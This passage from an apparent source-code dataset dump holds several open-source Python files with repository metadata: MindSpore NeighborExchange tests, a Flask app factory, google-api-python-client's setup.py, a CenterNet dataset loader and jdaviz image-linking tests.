safe_kill(po.pid, signal.SIGINT)
raise
| 36.232143
| 90
| 0.674717
|
a6320fef6b2aa5da9ac5ed94c5e259b7bf79b217
| 17,918
|
py
|
Python
|
tests/ut/python/parallel/test_neighborexchange.py
|
PowerOlive/mindspore
|
bda20724a94113cedd12c3ed9083141012da1f15
|
[
"Apache-2.0"
] | 3,200
|
2020-02-17T12:45:41.000Z
|
2022-03-31T20:21:16.000Z
|
tests/ut/python/parallel/test_neighborexchange.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 176
|
2020-02-12T02:52:11.000Z
|
2022-03-28T22:15:55.000Z
|
tests/ut/python/parallel/test_neighborexchange.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 621
|
2020-03-09T01:31:41.000Z
|
2022-03-30T03:43:19.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import pytest
import numpy as np
import mindspore as ms
import mindspore.context as context
from mindspore import Tensor, Parameter
import mindspore.nn as nn
from mindspore.common.api import _cell_graph_executor
from mindspore.nn import TrainOneStepCell, Momentum
from mindspore.ops import operations as P
from mindspore.ops.operations.comm_ops import NeighborExchange
_w1 = Tensor(np.ones([32, 32]), dtype=ms.float32)
_x1 = Tensor(np.ones([32, 16]), dtype=ms.float32)
_x2 = Tensor(np.ones([16, 32]), dtype=ms.float32)
def compile_net(net):
context.set_context(mode=context.GRAPH_MODE)
optimizer = Momentum(net.trainable_params(), learning_rate=0.1, momentum=0.9)
train_net = TrainOneStepCell(net, optimizer)
train_net.set_train()
_cell_graph_executor.compile(train_net, _x1, _x2)
def test_NeighborExchange_two_inputs_success():
"""
Feature: NeighborExchange
Description: two inputs and two outputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class MatMulNet(nn.Cell):
def __init__(self, weight1):
super(MatMulNet, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0, 1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 32], [32, 16]), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out, x1))
return out[0]
net = MatMulNet(_w1)
compile_net(net)
def test_NeighborExchange_single_input_success():
"""
Feature: NeighborExchange
Description: one inputs and two outputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class MatMulNet2(nn.Cell):
def __init__(self, weight1):
super(MatMulNet2, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=[1, 2], recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 32],), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = MatMulNet2(_w1)
compile_net(net)
def test_NeighborExchange_empty_send_success():
"""
Feature: NeighborExchange
Description: empty inputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[], recv_rank_ids=[1], recv_shapes=([1],),
send_shapes=(), recv_type=ms.float32)
def construct(self, x1):
self.alltoallv()
return x1
net = Net()
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_empty_recv_success():
"""
Feature: NeighborExchange
Description: empty outputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=[], recv_shapes=(),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
self.alltoallv((x1,))
return x1
net = Net()
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_empty_send_empty_recv_success():
"""
Feature: NeighborExchange
Description: empty inputs and empty outputs, with valid arguments
Expectation: success
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[], recv_rank_ids=[], recv_shapes=(),
send_shapes=(), recv_type=ms.float32)
def construct(self, x1):
self.alltoallv()
return x1
net = Net()
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_recv_shape_num_diff_with_recv_rank_size_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids and send_shapes are set as 1 input, but gives 2
Expectation: throw ValueError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self, weight1):
super(Net, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=[1, 2], recv_shapes=([32, 32],),
send_shapes=([32, 32],), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = Net(_w1)
with pytest.raises(ValueError):
compile_net(net)
def test_NeighborExchange_send_shape_num_diff_with_send_rank_size_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids is set as 2 inputs, but send_shapes are set as 1 input
Expectation: throw ValueError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self, weight1):
super(Net, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0, 1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 32]),
send_shapes=([32, 32],), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = Net(_w1)
with pytest.raises(ValueError):
compile_net(net)
def test_NeighborExchange_send_shape_num_diff_with_input_num_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids and send_shapes are set as 2 inputs, but has only 1 input
Expectation: throw Exception
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self, weight1):
super(Net, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0, 1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 32]),
send_shapes=([32, 32], [32, 32]), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = Net(_w1)
with pytest.raises(Exception):
compile_net(net)
def test_NeighborExchange_send_shape_diff_with_input_shape_failed():
"""
Feature: NeighborExchange
Description: send_shapes is set as [16, 16], but input is [32, 32]
Expectation: throw Exception
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self, weight1):
super(Net, self).__init__()
self.matmul = P.MatMul()
self.mul = P.Mul()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=[1, 2], recv_shapes=([32, 32], [32, 64]),
send_shapes=([16, 16],), recv_type=ms.float32)
self.weight1 = Parameter(weight1, "w1")
def construct(self, x1, x2):
out = self.matmul(x1, x2)
out = self.mul(out, self.weight1)
out = self.alltoallv((out,))
return out[0]
net = Net(_w1)
with pytest.raises(Exception):
compile_net(net)
def test_NeighborExchange_attr_check_send_rank_ids_is_tuple_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids should be list, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=(0), recv_rank_ids=[1, 2], recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_send_rank_ids_is_tuple_2_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids should be list, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=(0,), recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_send_rank_ids_is_float_failed():
"""
Feature: NeighborExchange
Description: send_rank_ids should be int, but a float is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1.0], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_recv_rank_ids_is_tuple_failed():
"""
Feature: NeighborExchange
Description: recv_rank_ids should be list, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=([1, 2],),
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_recv_rank_ids_is_tuple_2_failed():
"""
Feature: NeighborExchange
Description: recv_rank_ids should be list, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[0], recv_rank_ids=(1, 2,),
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_recv_rank_ids_is_float_failed():
"""
Feature: NeighborExchange
Description: recv_rank_ids should be int, but a float is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2.0],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_send_shape_not_tuple_failed():
"""
Feature: NeighborExchange
Description: send_shapes should be tuple(list), but a list is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16]), recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_send_shape_list_failed():
"""
Feature: NeighborExchange
Description: send_shapes should be tuple(list), but a list(list) is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=[[32, 16]], recv_type=ms.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_check_recv_type_numpy_failed():
"""
Feature: NeighborExchange
Description: recv_type should be mindspore type, but a numpy type is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=np.float32)
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
def test_NeighborExchange_attr_invalid_grpup_failed():
"""
Feature: NeighborExchange
Description: group should be str, but a tuple is given
Expectation: throw TypeError
"""
context.set_auto_parallel_context(device_num=8, global_rank=0)
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.alltoallv = NeighborExchange(send_rank_ids=[1], recv_rank_ids=[1, 2],
recv_shapes=([32, 32], [32, 64]),
send_shapes=([32, 16],), recv_type=ms.float32, group=("str",))
def construct(self, x1):
out = self.alltoallv((x1,))
return out[0]
net = Net()
with pytest.raises(TypeError):
_cell_graph_executor.compile(net, _x1)
| 35.064579
| 120
| 0.595825
|
5c8861562948f2b2fb3f7c50db148ae916e3354b
| 975
|
py
|
Python
|
app/__init__.py
|
willy-r/portfolio-feliz-backend
|
a95612ecf970075688171b481c10b418a8a5a7c6
|
[
"MIT"
] | 3
|
2021-05-20T23:35:06.000Z
|
2021-11-23T15:51:36.000Z
|
app/__init__.py
|
willy-r/portfolio-feliz-backend
|
a95612ecf970075688171b481c10b418a8a5a7c6
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
willy-r/portfolio-feliz-backend
|
a95612ecf970075688171b481c10b418a8a5a7c6
|
[
"MIT"
] | null | null | null |
from dotenv import load_dotenv
from flask import Flask, render_template
load_dotenv()
def create_app():
"""Create and configure the app."""
app = Flask(__name__)
app.config.from_object('app.config.ProductionConfig')
if app.config['ENV'] == 'development':
app.config.from_object('app.config.DevelopmentConfig')
from app.send_email import bp, mail
# Init Mail.
mail.init_app(app)
@app.get('/')
def index():
"""Show a simple form to test the application."""
return render_template('index.html')
@app.errorhandler(404)
def page_not_found(err):
return render_template('errors/404.html'), 404
@app.errorhandler(405)
def method_not_allowed(err):
return render_template('errors/405.html'), 405
@app.errorhandler(500)
def internal_server_error(err):
return render_template('errors/500.html'), 500
app.register_blueprint(bp)
return app
| 21.666667
| 62
| 0.657436
|
e2a487f8f73cdffe496b27575ac70af2ce2adde1
| 2,957
|
py
|
Python
|
setup.py
|
p13i/google-api-python-client
|
48f503fbae07b4b80773f526c16ea30e0e65806b
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
p13i/google-api-python-client
|
48f503fbae07b4b80773f526c16ea30e0e65806b
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
p13i/google-api-python-client
|
48f503fbae07b4b80773f526c16ea30e0e65806b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup script for Google API Python client.
Also installs included versions of third party libraries, if those libraries
are not already installed.
"""
from __future__ import print_function
import sys
if sys.version_info < (2, 7):
print("google-api-python-client requires python version >= 2.7.", file=sys.stderr)
sys.exit(1)
if (3, 1) <= sys.version_info < (3, 4):
print("google-api-python-client requires python3 version >= 3.4.", file=sys.stderr)
sys.exit(1)
import io
import os
from setuptools import setup
packages = ["apiclient", "googleapiclient", "googleapiclient/discovery_cache"]
install_requires = [
# NOTE: Apache Beam tests depend on this library and cannot
# currently upgrade their httplib2 version.
# Please see https://github.com/googleapis/google-api-python-client/pull/841
"httplib2>=0.9.2,<1dev",
"google-auth>=1.4.1",
"google-auth-httplib2>=0.0.3",
"google-api-core>=1.13.0,<2dev",
"six>=1.6.1,<2dev",
"uritemplate>=3.0.0,<4dev",
]
package_root = os.path.abspath(os.path.dirname(__file__))
readme_filename = os.path.join(package_root, "README.md")
with io.open(readme_filename, encoding="utf-8") as readme_file:
readme = readme_file.read()
version = "1.8.3"
setup(
name="google-api-python-client",
version=version,
description="Google API Client Library for Python",
long_description=readme,
long_description_content_type='text/markdown',
author="Google LLC",
author_email="googleapis-packages@google.com",
url="https://github.com/googleapis/google-api-python-client/",
install_requires=install_requires,
python_requires=">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*",
packages=packages,
package_data={},
license="Apache 2.0",
keywords="google api client",
classifiers=[
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP",
],
)
| 34.383721
| 87
| 0.685154
|
a266f2ebfc3023ac7df04468d0a9a55ab820366e
| 5,752
|
py
|
Python
|
src/lib/datasets/sample/exdet.py
|
seqsense/CenterNet
|
5cd5f3c1f42d8cfb5fc3157f8c1945b6787f11eb
|
[
"MIT"
] | null | null | null |
src/lib/datasets/sample/exdet.py
|
seqsense/CenterNet
|
5cd5f3c1f42d8cfb5fc3157f8c1945b6787f11eb
|
[
"MIT"
] | null | null | null |
src/lib/datasets/sample/exdet.py
|
seqsense/CenterNet
|
5cd5f3c1f42d8cfb5fc3157f8c1945b6787f11eb
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch.utils.data as data
import pycocotools.coco as coco
import numpy as np
import torch
import json
import cv2
import os
from centernet_utils.image import flip, color_aug
from centernet_utils.image import get_affine_transform, affine_transform
from centernet_utils.image import gaussian_radius, draw_umich_gaussian, draw_msra_gaussian
import pycocotools.coco as coco
import math
class EXDetDataset(data.Dataset):
def _coco_box_to_bbox(self, box):
bbox = np.array([box[0], box[1], box[0] + box[2], box[1] + box[3]],
dtype=np.float32)
return bbox
def _get_border(self, border, size):
i = 1
while size - border // i <= border // i:
i *= 2
return border // i
def __getitem__(self, index):
img_id = self.images[index]
img_info = self.coco.loadImgs(ids=[img_id])[0]
img_path = os.path.join(self.img_dir, img_info['file_name'])
img = cv2.imread(img_path)
height, width = img.shape[0], img.shape[1]
c = np.array([img.shape[1] / 2., img.shape[0] / 2.])
s = max(img.shape[0], img.shape[1]) * 1.0
flipped = False
if self.split == 'train':
if not self.opt.not_rand_crop:
s = s * np.random.choice(np.arange(0.6, 1.4, 0.1))
w_border = self._get_border(128, img.shape[1])
h_border = self._get_border(128, img.shape[0])
c[0] = np.random.randint(low=w_border, high=img.shape[1] - w_border)
c[1] = np.random.randint(low=h_border, high=img.shape[0] - h_border)
else:
sf = self.opt.scale
cf = self.opt.shift
s = s * np.clip(np.random.randn()*sf + 1, 1 - sf, 1 + sf)
c[0] += img.shape[1] * np.clip(np.random.randn()*cf, -2*cf, 2*cf)
c[1] += img.shape[0] * np.clip(np.random.randn()*cf, -2*cf, 2*cf)
if np.random.random() < self.opt.flip:
flipped = True
img = img[:, ::-1, :]
trans_input = get_affine_transform(
c, s, 0, [self.opt.input_res, self.opt.input_res])
inp = cv2.warpAffine(img, trans_input,
(self.opt.input_res, self.opt.input_res),
flags=cv2.INTER_LINEAR)
inp = (inp.astype(np.float32) / 255.)
if self.split == 'train' and not self.opt.no_color_aug:
color_aug(self._data_rng, inp, self._eig_val, self._eig_vec)
inp = (inp - self.mean) / self.std
inp = inp.transpose(2, 0, 1)
output_res = self.opt.output_res
num_classes = self.opt.num_classes
trans_output = get_affine_transform(c, s, 0, [output_res, output_res])
num_hm = 1 if self.opt.agnostic_ex else num_classes
hm_t = np.zeros((num_hm, output_res, output_res), dtype=np.float32)
hm_l = np.zeros((num_hm, output_res, output_res), dtype=np.float32)
hm_b = np.zeros((num_hm, output_res, output_res), dtype=np.float32)
hm_r = np.zeros((num_hm, output_res, output_res), dtype=np.float32)
hm_c = np.zeros((num_classes, output_res, output_res), dtype=np.float32)
reg_t = np.zeros((self.max_objs, 2), dtype=np.float32)
reg_l = np.zeros((self.max_objs, 2), dtype=np.float32)
reg_b = np.zeros((self.max_objs, 2), dtype=np.float32)
reg_r = np.zeros((self.max_objs, 2), dtype=np.float32)
ind_t = np.zeros((self.max_objs), dtype=np.int64)
ind_l = np.zeros((self.max_objs), dtype=np.int64)
ind_b = np.zeros((self.max_objs), dtype=np.int64)
ind_r = np.zeros((self.max_objs), dtype=np.int64)
reg_mask = np.zeros((self.max_objs), dtype=np.uint8)
ann_ids = self.coco.getAnnIds(imgIds=[img_id])
anns = self.coco.loadAnns(ids=ann_ids)
num_objs = min(len(anns), self.max_objs)
draw_gaussian = draw_msra_gaussian if self.opt.mse_loss else \
draw_umich_gaussian
for k in range(num_objs):
ann = anns[k]
# bbox = self._coco_box_to_bbox(ann['bbox'])
# tlbr
pts = np.array(ann['extreme_points'], dtype=np.float32).reshape(4, 2)
# cls_id = int(self.cat_ids[ann['category_id']] - 1) # bug
cls_id = int(self.cat_ids[ann['category_id']])
hm_id = 0 if self.opt.agnostic_ex else cls_id
if flipped:
pts[:, 0] = width - pts[:, 0] - 1
pts[1], pts[3] = pts[3].copy(), pts[1].copy()
for j in range(4):
pts[j] = affine_transform(pts[j], trans_output)
pts = np.clip(pts, 0, self.opt.output_res - 1)
h, w = pts[2, 1] - pts[0, 1], pts[3, 0] - pts[1, 0]
if h > 0 and w > 0:
radius = gaussian_radius((math.ceil(h), math.ceil(w)))
radius = max(0, int(radius))
pt_int = pts.astype(np.int32)
draw_gaussian(hm_t[hm_id], pt_int[0], radius)
draw_gaussian(hm_l[hm_id], pt_int[1], radius)
draw_gaussian(hm_b[hm_id], pt_int[2], radius)
draw_gaussian(hm_r[hm_id], pt_int[3], radius)
reg_t[k] = pts[0] - pt_int[0]
reg_l[k] = pts[1] - pt_int[1]
reg_b[k] = pts[2] - pt_int[2]
reg_r[k] = pts[3] - pt_int[3]
ind_t[k] = pt_int[0, 1] * output_res + pt_int[0, 0]
ind_l[k] = pt_int[1, 1] * output_res + pt_int[1, 0]
ind_b[k] = pt_int[2, 1] * output_res + pt_int[2, 0]
ind_r[k] = pt_int[3, 1] * output_res + pt_int[3, 0]
ct = [int((pts[3, 0] + pts[1, 0]) / 2), int((pts[0, 1] + pts[2, 1]) / 2)]
draw_gaussian(hm_c[cls_id], ct, radius)
reg_mask[k] = 1
ret = {'input': inp, 'hm_t': hm_t, 'hm_l': hm_l, 'hm_b': hm_b,
'hm_r': hm_r, 'hm_c': hm_c}
if self.opt.reg_offset:
ret.update({'reg_mask': reg_mask,
'reg_t': reg_t, 'reg_l': reg_l, 'reg_b': reg_b, 'reg_r': reg_r,
'ind_t': ind_t, 'ind_l': ind_l, 'ind_b': ind_b, 'ind_r': ind_r})
return ret
| 41.985401
| 90
| 0.615612
|
4d587eb7173c425b549b12d75c283debaf7c4062
| 7,672
|
py
|
Python
|
jdaviz/configs/imviz/tests/test_linking.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
jdaviz/configs/imviz/tests/test_linking.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 3
|
2021-05-06T13:03:37.000Z
|
2021-12-02T14:51:48.000Z
|
jdaviz/configs/imviz/tests/test_linking.py
|
rosteen/jdaviz
|
e02c08d68ef71c5e40600785f46e65e5ae95e236
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2021-12-27T04:24:34.000Z
|
2021-12-27T04:24:34.000Z
|
import pytest
from astropy.table import Table
from glue.core.link_helpers import LinkSame
from glue.plugins.wcs_autolinking.wcs_autolinking import OffsetLink, WCSLink
from numpy.testing import assert_allclose
from regions import PixCoord, CirclePixelRegion
from jdaviz.configs.imviz.helper import get_reference_image_data
from jdaviz.configs.imviz.tests.utils import BaseImviz_WCS_NoWCS, BaseImviz_WCS_WCS
class BaseLinkHandler:
def check_all_pixel_links(self):
links = self.imviz.app.data_collection.external_links
assert len(links) == 2
assert all([isinstance(link, LinkSame) for link in links])
def test_pixel_linking(self):
self.imviz.link_data(link_type='pixels', error_on_fail=True)
self.check_all_pixel_links()
class TestLink_WCS_NoWCS(BaseImviz_WCS_NoWCS, BaseLinkHandler):
def test_wcslink_fallback_pixels(self):
self.imviz.link_data(link_type='wcs', error_on_fail=True)
self.check_all_pixel_links()
assert self.viewer.get_link_type('has_wcs[SCI,1]') == 'self'
assert self.viewer.get_link_type('no_wcs[SCI,1]') == 'pixels'
# Also check the coordinates display
self.viewer.on_mouse_or_key_event({'event': 'mousemove', 'domain': {'x': 0, 'y': 0}})
assert self.viewer.label_mouseover.pixel == 'x=00.0 y=00.0'
assert self.viewer.label_mouseover.value == '+0.00000e+00 '
assert self.viewer.label_mouseover.world_ra_deg == '337.5202808000'
assert self.viewer.label_mouseover.world_dec_deg == '-20.8333330600'
# Not sure why but need one extra blink to work properly.
# This does not happen when we load real data from files.
self.viewer.blink_once()
self.viewer.on_mouse_or_key_event({'event': 'keydown', 'key': 'b',
'domain': {'x': 0, 'y': 0}})
assert self.viewer.label_mouseover.pixel == 'x=00.0 y=00.0'
assert self.viewer.label_mouseover.value == '+0.00000e+00 '
assert self.viewer.label_mouseover.world_ra_deg == ''
assert self.viewer.label_mouseover.world_dec_deg == ''
def test_wcslink_nofallback_noerror(self):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None)
self.check_all_pixel_links() # Keeps old links because operation failed silently
def test_wcslink_nofallback_error(self):
with pytest.raises(AttributeError, match='pixel_n_dim'):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, error_on_fail=True)
class TestLink_WCS_WCS(BaseImviz_WCS_WCS, BaseLinkHandler):
def test_wcslink_affine_with_extras(self):
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, error_on_fail=True)
links = self.imviz.app.data_collection.external_links
assert len(links) == 1
assert isinstance(links[0], OffsetLink)
assert self.viewer.get_link_type('has_wcs_2[SCI,1]') == 'wcs'
# Customize display on second image (last loaded).
self.viewer.set_colormap('viridis')
self.viewer.stretch = 'sqrt'
self.viewer.cuts = (0, 100)
# Add subsets, both interactive and static.
self.imviz._apply_interactive_region('bqplot:circle', (1.5, 2.5), (3.6, 4.6))
self.imviz.load_static_regions({
'my_reg': CirclePixelRegion(center=PixCoord(x=6, y=2), radius=5)})
# Add markers.
tbl = Table({'x': (0, 0), 'y': (0, 1)})
self.viewer.add_markers(tbl, marker_name='xy_markers')
assert 'xy_markers' in self.imviz.app.data_collection.labels
# Run linking again, does not matter what kind.
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, error_on_fail=True)
# Ensure display is still customized.
assert self.viewer.state.layers[1].cmap.name == 'viridis'
assert self.viewer.state.layers[1].stretch == 'sqrt'
assert_allclose((self.viewer.state.layers[1].v_min, self.viewer.state.layers[1].v_max),
(0, 100))
# Ensure subsets are still there.
assert 'Subset 1' in self.imviz.get_interactive_regions()
assert 'my_reg' in [layer.layer.label for layer in self.viewer.state.layers]
# Ensure markers are deleted.
# Zoom and pan will reset in this case, so we do not check those.
assert 'xy_markers' not in self.imviz.app.data_collection.labels
assert len(self.viewer._marktags) == 0
# Pan/zoom.
self.viewer.center_on((5, 5))
self.viewer.zoom_level = 0.789
ans = (self.viewer.state.x_min, self.viewer.state.y_min,
self.viewer.state.x_max, self.viewer.state.y_max)
# Run linking again, does not matter what kind.
self.imviz.link_data(link_type='wcs', wcs_fallback_scheme=None, error_on_fail=True)
# Ensure pan/zoom does not change when markers are not present.
assert_allclose((self.viewer.state.x_min, self.viewer.state.y_min,
self.viewer.state.x_max, self.viewer.state.y_max), ans)
# Also check the coordinates display
self.viewer.on_mouse_or_key_event({'event': 'mousemove', 'domain': {'x': 0, 'y': 0}})
assert self.viewer.label_mouseover.pixel == 'x=00.0 y=00.0'
assert self.viewer.label_mouseover.value == '+1.00000e+00 '
assert self.viewer.label_mouseover.world_ra_deg == '337.5202808000'
assert self.viewer.label_mouseover.world_dec_deg == '-20.8333330600'
# Not sure why but need one extra blink to work properly.
# This does not happen when we load real data from files.
self.viewer.blink_once()
self.viewer.on_mouse_or_key_event({'event': 'keydown', 'key': 'b',
'domain': {'x': 0, 'y': 0}})
